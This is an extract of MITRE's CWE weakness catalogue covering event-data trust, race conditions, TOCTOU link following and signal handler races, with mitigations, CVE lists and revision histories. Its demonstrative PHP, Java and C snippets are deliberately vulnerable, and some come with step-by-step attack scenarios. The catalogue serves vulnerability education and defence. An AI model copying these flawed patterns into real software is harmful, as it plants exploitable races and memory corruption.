2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Demonstrative_Examples, Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Security based on event locations are insecure and can be spoofed. + Events are a messaging system which may provide control data to programs listening for events. Events often do not have any type of authentication framework to allow them to be verified from a trusted source. Any application, in Windows, on a given desktop can send a message to any window on the same desktop. There is no authentication framework for these messages. Therefore, any message can be used to manipulate any process on the desktop if the process does not check the validity and safeness of those messages. + + + + + + + + + Architecture and Design + + + Implementation + + + High + + + Integrity + Confidentiality + Availability + Access Control + Gain Privileges or Assume Identity + Execute Unauthorized Code or Commands + If one trusts the system-event information and executes commands based on it, one could potentially take actions based on a spoofed identity. + + + + + Architecture and Design + Never trust or rely any of the information in an Event for security. + + + + + This example code prints out secret information when an authorized user activates a button: + + public void actionPerformed(ActionEvent e) {if (e.getSource() == button) {System.out.println("print out secret information");}} + + This code does not attempt to prevent unauthorized users from activating the button. Even if the button is rendered non-functional to unauthorized users in the application UI, an attacker can easily send a false button press event to the application window and expose the secret information. + + + + + Trust of system event data + + + SFP29 + Faulty endpoint authentication + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-02-16 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently. + + This can have security implications when the expected synchronization is in security-critical code, such as recording whether a user is authenticated or modifying important state information that should not be influenced by an outsider. + A race condition occurs within concurrent environments, and is effectively a property of a code sequence. Depending on the context, a code sequence may be in the form of a function call, a small number of instructions, a series of program invocations, etc. + A race condition violates these properties, which are closely related: + + Exclusivity - the code sequence is given exclusive access to the shared resource, i.e., no other code sequence can modify properties of the shared resource before the original sequence has completed execution. + Atomicity - the code sequence is behaviorally atomic, i.e., no other thread or process can concurrently execute the same sequence of instructions (or a subset) against the same resource. + + A race condition exists when an "interfering code sequence" can still access the shared resource, violating exclusivity. Programmers may assume that certain code sequences execute too quickly to be affected by an interfering code sequence; when they are not, this violates atomicity. For example, the single "x++" statement may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read (the original value of x), followed by a computation (x+1), followed by a write (save the result to x). + The interfering code sequence could be "trusted" or "untrusted." A trusted interfering code sequence occurs within the product; it cannot be modified by the attacker, and it can only be invoked indirectly. An untrusted interfering code sequence can be authored directly by the attacker, and typically it is external to the vulnerable product. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + + + Medium + + + Availability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Resource Consumption (Other) + When a race condition makes it possible to bypass a resource cleanup routine or trigger multiple initialization routines, it may lead to resource exhaustion (CWE-400). + + + Availability + DoS: Crash, Exit, or Restart + DoS: Instability + When a race condition allows multiple control flows to access a resource simultaneously, it might lead the product(s) into unexpected states, possibly resulting in a crash. + + + Confidentiality + Integrity + Read Files or Directories + Read Application Data + When a race condition is combined with predictable resource names and loose permissions, it may be possible for an attacker to overwrite or access confidential data (CWE-59). + + + + + Black Box + Black box methods may be able to identify evidence of race conditions via methods such as multiple simultaneous connections, which may cause the software to become instable or crash. However, race conditions with very narrow timing windows would not be detectable. + + + White Box + Common idioms are detectable in white box analysis, such as time-of-check-time-of-use (TOCTOU) file operations (CWE-367), or double-checked locking (CWE-609). + + + Automated Dynamic Analysis + + This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + Race conditions may be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. + Insert breakpoints or delays in between relevant code statements to artificially expand the race window so that it will be easier to detect. + + Moderate + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + + Cost effective for partial coverage: + + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + High + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Framework-based Fuzzer + + Cost effective for partial coverage: + + Fuzz Tester + Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Architecture and Design + In languages that support it, use synchronization primitives. Only wrap these around critical code to minimize the impact on performance. + + + Architecture and Design + Use thread-safe capabilities such as the data access abstraction in Spring. + + + Architecture and Design + + Minimize the usage of shared resources in order to remove as much complexity as possible from the control flow and to reduce the likelihood of unexpected conditions occurring. + Additionally, this will minimize the amount of synchronization necessary and may even help to reduce the likelihood of a denial of service where an attacker may be able to repeatedly trigger a critical section (CWE-400). + + + + Implementation + When using multithreading and operating on shared variables, only use thread-safe functions. + + + Implementation + Use atomic operations on shared variables. Be wary of innocent-looking constructs such as "x++". This may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read, followed by a computation, followed by a write. + + + Implementation + Use a mutex if available, but be sure to avoid related weaknesses such as CWE-412. + + + Implementation + Avoid double-checked locking (CWE-609) and other implementation errors that arise when trying to avoid the overhead of synchronization. + + + Implementation + Disable interrupts or signals over critical parts of the code, but also make sure that the code does not go into a large or infinite loop. + + + Implementation + Use the volatile type modifier for critical variables to avoid unexpected compiler optimization or reordering. This does not necessarily solve the synchronization problem, but it can help. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + + + This code could be used in an e-commerce application that supports transfers between accounts. It takes the total amount of the transfer, sends it to the new account, and deducts the amount from the original account. + + $transfer_amount = GetTransferAmount();$balance = GetBalanceFromDatabase(); + if ($transfer_amount < 0) {FatalError("Bad Transfer Amount");}$newbalance = $balance - $transfer_amount;if (($balance - $transfer_amount) < 0) {FatalError("Insufficient Funds");}SendNewBalanceToDatabase($newbalance);NotifyUser("Transfer of $transfer_amount succeeded.");NotifyUser("New balance: $newbalance"); + + A race condition could occur between the calls to GetBalanceFromDatabase() and SendNewBalanceToDatabase(). + Suppose the balance is initially 100.00. An attack could be constructed as follows: + + In the following pseudocode, the attacker makes two simultaneous calls of the program, CALLER-1 and CALLER-2. Both callers are for the same user account.CALLER-1 (the attacker) is associated with PROGRAM-1 (the instance that handles CALLER-1). CALLER-2 is associated with PROGRAM-2.CALLER-1 makes a transfer request of 80.00.PROGRAM-1 calls GetBalanceFromDatabase and sets $balance to 100.00PROGRAM-1 calculates $newbalance as 20.00, then calls SendNewBalanceToDatabase().Due to high server load, the PROGRAM-1 call to SendNewBalanceToDatabase() encounters a delay.CALLER-2 makes a transfer request of 1.00.PROGRAM-2 calls GetBalanceFromDatabase() and sets $balance to 100.00. This happens because the previous PROGRAM-1 request was not processed yet.PROGRAM-2 determines the new balance as 99.00.After the initial delay, PROGRAM-1 commits its balance to the database, setting it to 20.00.PROGRAM-2 sends a request to update the database, setting the balance to 99.00 + + At this stage, the attacker should have a balance of 19.00 (due to 81.00 worth of transfers), but the balance is 99.00, as recorded in the database. + To prevent this weakness, the programmer has several options, including using a lock to prevent multiple simultaneous requests to the web application, or using a synchronization mechanism that includes all the code between GetBalanceFromDatabase() and SendNewBalanceToDatabase(). + + + The following function attempts to acquire a lock in order to perform operations on a shared resource. + + void f(pthread_mutex_t *mutex) { + pthread_mutex_lock(mutex); + + /* access shared resource */ + + + pthread_mutex_unlock(mutex); + } + + However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior. + In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels. + + int f(pthread_mutex_t *mutex) { + int result; + result = pthread_mutex_lock(mutex);if (0 != result)return result; + + + /* access shared resource */ + + + return pthread_mutex_unlock(mutex); + } + + + + Suppose a processor's Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of "accessible" memory. Any time this accessible range changes (as per the processor's boot status), the main MMU sends an update message to all the shadow MMUs. + Suppose the interconnect fabric does not prioritize such "update" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario. + + + + + CVE-2022-29527 + Go application for cloud management creates a world-writable sudoers file that allows local attackers to inject sudo rules and escalate privileges to root by winning a race condition. + https://www.cve.org/CVERecord?id=CVE-2022-29527 + + + CVE-2021-1782 + Chain: improper locking (CWE-667) leads to race condition (CWE-362), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-1782 + + + CVE-2021-0920 + Chain: mobile platform race condition (CWE-362) leading to use-after-free (CWE-416), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-0920 + + + CVE-2020-6819 + Chain: race condition (CWE-362) leads to use-after-free (CWE-416), as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2020-6819 + + + CVE-2019-18827 + chain: JTAG interface is not disabled (CWE-1191) during ROM code execution, introducing a race condition (CWE-362) to extract encryption keys + https://www.cve.org/CVERecord?id=CVE-2019-18827 + + + CVE-2019-1161 + Chain: race condition (CWE-362) in anti-malware product allows deletion of files by creating a junction (CWE-1386) and using hard links during the time window in which a temporary file is created and deleted. + https://www.cve.org/CVERecord?id=CVE-2019-1161 + + + CVE-2015-1743 + TOCTOU in sandbox process allows installation of untrusted browser add-ons by replacing a file after it has been verified, but before it is executed + https://www.cve.org/CVERecord?id=CVE-2015-1743 + + + CVE-2014-8273 + Chain: chipset has a race condition (CWE-362) between when an interrupt handler detects an attempt to write-enable the BIOS (in violation of the lock bit), and when the handler resets the write-enable bit back to 0, allowing attackers to issue BIOS writes during the timing window [REF-1237]. + https://www.cve.org/CVERecord?id=CVE-2014-8273 + + + CVE-2008-5044 + Race condition leading to a crash by calling a hook removal procedure while other activities are occurring at the same time. + https://www.cve.org/CVERecord?id=CVE-2008-5044 + + + CVE-2008-2958 + chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks. + https://www.cve.org/CVERecord?id=CVE-2008-2958 + + + CVE-2008-1570 + chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks. + https://www.cve.org/CVERecord?id=CVE-2008-1570 + + + CVE-2008-0058 + Unsynchronized caching operation enables a race condition that causes messages to be sent to a deallocated object. + https://www.cve.org/CVERecord?id=CVE-2008-0058 + + + CVE-2008-0379 + Race condition during initialization triggers a buffer overflow. + https://www.cve.org/CVERecord?id=CVE-2008-0379 + + + CVE-2007-6599 + Daemon crash by quickly performing operations and undoing them, which eventually leads to an operation that does not acquire a lock. + https://www.cve.org/CVERecord?id=CVE-2007-6599 + + + CVE-2007-6180 + chain: race condition triggers NULL pointer dereference + https://www.cve.org/CVERecord?id=CVE-2007-6180 + + + CVE-2007-5794 + Race condition in library function could cause data to be sent to the wrong process. + https://www.cve.org/CVERecord?id=CVE-2007-5794 + + + CVE-2007-3970 + Race condition in file parser leads to heap corruption. + https://www.cve.org/CVERecord?id=CVE-2007-3970 + + + CVE-2008-5021 + chain: race condition allows attacker to access an object while it is still being initialized, causing software to access uninitialized memory. + https://www.cve.org/CVERecord?id=CVE-2008-5021 + + + CVE-2009-4895 + chain: race condition for an argument value, possibly resulting in NULL dereference + https://www.cve.org/CVERecord?id=CVE-2009-4895 + + + CVE-2009-3547 + chain: race condition might allow resource to be released before operating on it, leading to NULL dereference + https://www.cve.org/CVERecord?id=CVE-2009-3547 + + + CVE-2006-5051 + Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition (CWE-362) that leads to a double free (CWE-415). + https://www.cve.org/CVERecord?id=CVE-2006-5051 + + + + + Race Conditions + + + VNA03-J + Do not assume that a group of calls to independently atomic methods is atomic + + + + + + + + + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + The relationship between race conditions and synchronization problems (CWE-662) needs to be further developed. They are not necessarily two perspectives of the same core concept, since synchronization is only one technique for avoiding race conditions, and synchronization can be used for other purposes besides race condition prevention. + Race conditions in web applications are under-studied and probably under-reported. However, in 2008 there has been growing interest in this area. + Much of the focus of race condition research has been in Time-of-check Time-of-use (TOCTOU) variants (CWE-367), but many race conditions are related to synchronization problems that do not necessarily require a time-of-check. + From a classification/taxonomy perspective, the relationships between concurrency and program state need closer investigation and may be useful in organizing related issues. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationships, Research_Gaps + + + CWE Content Team + MITRE + 2009-03-10 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Observed_Examples, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-12-13 + updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, References, Research_Gaps, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Demonstrative_Examples, Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Observed_Examples, References + + + CWE Content Team + MITRE + 2022-04-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Common_Consequences, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + Martin Sebor + Cisco Systems, Inc. + 2010-04-30 + Provided Demonstrative Example + + Race Conditions + Race Condition + + + + The product checks the status of a file or directory before accessing it, which produces a race condition in which the file can be replaced with a link before the access is performed, causing the product to access the wrong file. + While developers might expect that there is a very narrow time window between the time of check and time of use, there is still a race condition. An attacker could cause the product to slow down (e.g. with memory consumption), causing the time window to become larger. Alternately, in some situations, the attacker could win the race by performing a large number of attacks. + + + + + + + + + + Architecture and Design + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + This code prints the contents of a file if a user has permission. + + function readFile($filename){ + $user = getCurrentUser(); + + //resolve file if its a symbolic link + if(is_link($filename)){$filename = readlink($filename);} + if(fileowner($filename) == $user){echo file_get_contents($realFile);return;}else{echo 'Access denied';return false;} + } + + This code attempts to resolve symbolic links before checking the file and printing its contents. However, an attacker may be able to change the file from a real file to a symbolic link between the calls to is_link() and file_get_contents(), allowing the reading of arbitrary files. Note that this code fails to log the attempted access (CWE-778). + + + + + Race condition enabling link following + + + POS35-C + Avoid race conditions while checking for the existence of a symbolic link + Exact + + + SFP20 + Race Condition Window + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This is already covered by the "Link Following" weakness (CWE-59). It is included here because so many people associate race conditions with link problems; however, not all link following issues involve race conditions. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Other_Notes, Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a signal handler that introduces a race condition. + + Race conditions frequently occur in signal handlers, since signal handlers support asynchronous actions. These race conditions have a variety of root causes and symptoms. Attackers may be able to exploit a signal handler race condition to cause the product state to be corrupted, possibly leading to a denial of service or even code execution. + These issues occur when non-reentrant functions, or state-sensitive actions occur in the signal handler, where they may be called at any time. These behaviors can violate assumptions being made by the "regular" code that is interrupted, or by other signal handlers that may also be invoked. If these functions are called at an inopportune moment - such as while a non-reentrant function is already running - memory corruption could occur that may be exploitable for code execution. Another signal race condition commonly found occurs when free is called within a signal handler, resulting in a double free and therefore a write-what-where condition. Even if a given pointer is set to NULL after it has been freed, a race condition still exists between the time the memory was freed and the pointer was set to NULL. This is especially problematic if the same signal handler has been set for more than one signal -- since it means that the signal handler itself may be reentered. + There are several known behaviors related to signal handlers that have received the label of "signal handler race condition": + + Shared state (e.g. global data or static variables) that are accessible to both a signal handler and "regular" code + Shared state between a signal handler and other signal handlers + Use of non-reentrant functionality within a signal handler - which generally implies that shared state is being used. For example, malloc() and free() are non-reentrant because they may use global or static data structures for managing memory, and they are indirectly used by innocent-seeming functions such as syslog(); these functions could be exploited for memory corruption and, possibly, code execution. + Association of the same signal handler function with multiple signals - which might imply shared state, since the same code and resources are accessed. For example, this can be a source of double-free and use-after-free weaknesses. + Use of setjmp and longjmp, or other mechanisms that prevent a signal handler from returning control back to the original functionality + While not technically a race condition, some signal handlers are designed to be called at most once, and being called more than once can introduce security problems, even when there are not any concurrent calls to the signal handler. This can be a source of double-free and use-after-free weaknesses. + + Signal handler vulnerabilities are often classified based on the absence of a specific protection mechanism, although this style of classification is discouraged in CWE because programmers often have a choice of several different mechanisms for addressing the weakness. Such protection mechanisms may preserve exclusivity of access to the shared resource, and behavioral atomicity for the relevant code: + + Avoiding shared state + Using synchronization in the signal handler + Using synchronization in the regular code + Disabling or masking other signals, which provides atomicity (which effectively ensures exclusivity) + + + + + + + + + + + + + + + Implementation + + + Medium + + + Integrity + Confidentiality + Availability + Modify Application Data + Modify Memory + DoS: Crash, Exit, or Restart + Execute Unauthorized Code or Commands + It may be possible to cause data corruption and possibly execute arbitrary code by modifying global variables or data structures at unexpected times, violating the assumptions of code that uses this global data. + + + Access Control + Gain Privileges or Assume Identity + If a signal handler interrupts code that is executing with privileges, it may be possible that the signal handler will also be executed with elevated privileges, possibly making subsequent exploits more severe. + + + + + Requirements + Language Selection + Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + + + Architecture and Design + Design signal handlers to only set flags, rather than perform complex functionality. These flags can then be checked and acted upon within the main program loop. + + + Implementation + Only use reentrant functions within signal handlers. Also, use validation to ensure that state is consistent while performing asynchronous actions that affect the state of execution. + + + + + This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits. + + char *logMessage; + void handler (int sigNum) { + syslog(LOG_NOTICE, "%s\n", logMessage);free(logMessage); + /* artificially increase the size of the timing window to make demonstration of this weakness easier. */ + + sleep(10);exit(0); + } + int main (int argc, char* argv[]) { + logMessage = strdup(argv[1]); + /* Register signal handlers. */ + + signal(SIGHUP, handler);signal(SIGTERM, handler); + /* artificially increase the size of the timing window to make demonstration of this weakness easier. */ + + sleep(10); + } + + The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines: + + + + The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM. + + + The program begins its "normal" functionality, which is simplified as sleep(), but could be any functionality that consumes some time. + + + The attacker sends SIGHUP, which invokes handler (call this "SIGHUP-handler"). + + + SIGHUP-handler begins to execute, calling syslog(). + + + syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap. + + + The attacker then sends SIGTERM. + + + SIGHUP-handler is interrupted, but syslog's malloc call is still executing and has not finished modifying its metadata. + + + The SIGTERM handler is invoked. + + + SIGTERM-handler records the log message using syslog(), then frees the logMessage variable. + + + + At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running. + Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution. + Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array. + + + The following code registers a signal handler with multiple signals in order to log when a specific event occurs and to free associated memory before exiting. + + #include <signal.h>#include <syslog.h>#include <string.h>#include <stdlib.h> + void *global1, *global2;char *what;void sh (int dummy) { + syslog(LOG_NOTICE,"%s\n",what);free(global2);free(global1); + /* Sleep statements added to expand timing window for race condition */ + + sleep(10);exit(0); + } + int main (int argc,char* argv[]) { + what=argv[1];global1=strdup(argv[2]);global2=malloc(340);signal(SIGHUP,sh);signal(SIGTERM,sh); + /* Sleep statements added to expand timing window for race condition */ + + sleep(10);exit(0); + } + + However, the following sequence of events may result in a double-free (CWE-415): + + + + a SIGHUP is delivered to the process + + + sh() is invoked to process the SIGHUP + + + This first invocation of sh() reaches the point where global1 is freed + + + At this point, a SIGTERM is sent to the process + + + the second invocation of sh() might do another free of global1 + + + this results in a double-free (CWE-415) + + + + This is just one possible exploitation of the above code. As another example, the syslog call may use malloc calls which are not async-signal safe. This could cause corruption of the heap management structures. For more details, consult the example within "Delivering Signals for Fun and Profit" [REF-360]. + + + + + CVE-1999-0035 + Signal handler does not disable other signal handlers, allowing it to be interrupted, causing other functionality to access files/etc. with raised privileges + https://www.cve.org/CVERecord?id=CVE-1999-0035 + + + CVE-2001-0905 + Attacker can send a signal while another signal handler is already running, leading to crash or execution with root privileges + https://www.cve.org/CVERecord?id=CVE-2001-0905 + + + CVE-2001-1349 + unsafe calls to library functions from signal handler + https://www.cve.org/CVERecord?id=CVE-2001-1349 + + + CVE-2004-0794 + SIGURG can be used to remotely interrupt signal handler; other variants exist + https://www.cve.org/CVERecord?id=CVE-2004-0794 + + + CVE-2004-2259 + SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free. + https://www.cve.org/CVERecord?id=CVE-2004-2259 + + + + Signals + Interprocess Communication + + + System Process + + + + Signal handler race condition + + + Signal Handling Race Conditions + + + Race condition in signal handler + + + SFP19 + Missing Lock + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-09-27 + updated Observed_Examples, References + + + CWE Content Team + MITRE + 2010-12-13 + updated Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Demonstrative_Examples, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships, Research_Gaps + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This entry has been deprecated. There are no documented cases in which a switch's control expression is evaluated more than once. + It is likely that this entry was initially created based on a misinterpretation of the original source material. The original source intended to explain how switches could be unpredictable when using threads, if the control expressions used data or variables that could change between execution of different threads. That weakness is already covered by CWE-367. Despite the ambiguity in the documentation for some languages and compilers, in practice, they all evaluate the switch control expression only once. If future languages state that the code explicitly evaluates the control expression more than once, then this would not be a weakness, but the language performing as designed. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Common_Consequences, Description, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, 